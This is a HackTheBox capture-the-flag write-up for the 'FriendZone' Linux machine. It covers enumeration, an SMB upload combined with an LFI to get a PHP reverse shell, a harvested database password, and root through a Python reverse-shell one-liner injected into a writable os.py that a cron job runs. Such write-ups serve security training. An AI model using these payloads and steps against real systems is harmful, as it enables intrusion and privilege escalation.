imported>Aghanim at 11:56, 5 April 2022

2022-04-05T11:56:42Z

New page

{{Infobox WriteUp
| name = FriendZone
| platform = HackTheBox
| os = Linux
| difficulty = Easy
| techniques = LFI, SMB, Python Library Hijack
}}

[[File:2022-04-FriendZone.png|thumb]]

This Linux machine had a PHP page with LFI vulnerability. To upload a webshell I used SMB. From there we find credentials from a database config file. To root the machine I added a reverse shell to a writeable python module which was called upon by a python script run by root in cronjob.

== Enumeration ==

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# cat nmap.ver
# Nmap 7.92 scan initiated Wed Feb 9 09:04:20 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.ver 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.042s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn:
|_ http/1.1
|_http-title: 404 Not Found
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -38m03s, deviation: 1h09m16s, median: 1m56s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-02-09T16:06:37+02:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-09T14:06:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: , NetBIOS MAC: (unknown)

</syntaxhighlight>

Add '''friendzone.red '''to /etc/hosts file.

=== Zone transfer ===

>
DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a type of DNS transaction. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers.
[https://en.wikipedia.org/wiki/DNS_zone_transfer Wikipedia]

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# dig axfr @10.10.10.123 friendzone.red

; > DiG 9.17.21-1-Debian > axfr @10.10.10.123 friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 72 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Wed Feb 09 09:16:58 EST 2022
;; XFR size: 8 records (messages 1, bytes 289)
</syntaxhighlight>

We now add the new subdomains to /etc/hosts file.

=== Sub-dir bruteforce - Feroxbuster ===

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# gobuster dir -u https://administrator1.friendzone.red -x php,jpg -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://administrator1.friendzone.red
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,jpg
[+] Timeout: 10s
===============================================================
2022/02/09 13:47:13 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/login.php (Status: 200) [Size: 7]
/dashboard.php (Status: 200) [Size: 101]
/timestamp.php (Status: 200) [Size: 36]
/server-status (Status: 403) [Size: 318]
</syntaxhighlight>

=== Looking at the webpages ===

We find one interesting webpage.

[[File:2022-04-Pasted-image-20220209200044.png|thumb]]

[[File:2022-04-Pasted-image-20220209200118.png|thumb]]

== SMB enumeration ==

Looking at the path for each share we can see that for example \Development is pointing to C:\etc\Development.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# nmap -p 445 -Pn friendzone.red --script smb-enum-shares 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 05:31 EST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.13s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users:
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users:
| Path: C:\etc\hole
| Anonymous access:
| Current user access:
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users:
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users:
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users:
| Path: C:\var\lib\samba\printers
| Anonymous access:
|_ Current user access:
</syntaxhighlight>

== Initial Access - Shell as www-data ==

=== Test LFI ===

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# cat hello.php

</syntaxhighlight>

Upload the php file to SMB.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# smbclient //10.10.10.123/Development
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put hello.php
putting file hello.php as \hello.php (0.3 kb/s) (average 0.3 kb/s)
smb: \> ls
. D 0 Wed Feb 9 15:02:15 2022
.. D 0 Wed Jan 23 16:51:02 2019
hello.php A 33 Wed Feb 9 15:03:47 2022

9221460 blocks of size 1024. 6326080 blocks available
smb: \>
</syntaxhighlight>

We know that Development is in '''/etc'''.

[[File:2022-04-Pasted-image-20220209210107.png|thumb]]

=== Reverse shell ===

We upload a php reverse shell to SMB.

<syntaxhighlight lang="bash">
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (51.6 kb/s) (average 51.6 kb/s)
</syntaxhighlight>

We curling or visiting this URL we will get a reverse shell.

<syntaxhighlight lang="bash">
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell
</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.123] 58218
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
22:49:28 up 6:43, 0 users, load average: 0.00, 0.27, 0.39
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
</syntaxhighlight>

== Shell as Friend ==

In /var/www there is a mysql config file which have the credentials for the user friend. We can now su to friend.

<syntaxhighlight lang="bash">
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ
</syntaxhighlight>

== Root ==

=== Enumeration ===

In /opt/ there is a script caleld '''reporter.py'''.

This script looks like its trying to send an email from admin2 to admin1. But the script is not finished yet as we can see from the comment below.

<syntaxhighlight lang="bash">
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
</syntaxhighlight>

=== pspy ===

>
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.
https://github.com/DominicBreuker/pspy

Uploading pspy to the target machine and running it we can see from the output that the script '''reporter.py '''is running every two minutes.

friend@FriendZone:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done

</pre>

[[File:2022-04-Pasted-image-20220210114034.png|thumb]]

=== Command injection ===

os.py is writeable so we can inject a reverse shell.

[[File:2022-04-Pasted-image-20220210114422.png|thumb]]

We use a python reverse shell from PayloadAllthethings.

<syntaxhighlight lang="python">
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
</syntaxhighlight>

[[File:2022-04-Pasted-image-20220210121434.png|thumb]]

=== Shell as root ===

Now I'll wait two minutes for the cronjob to run and I'll have a connection on my listener.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.123] 47128
# whoami
whoami
root
#
</syntaxhighlight>

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/FriendZone - Revision history

imported>Aghanim at 11:56, 5 April 2022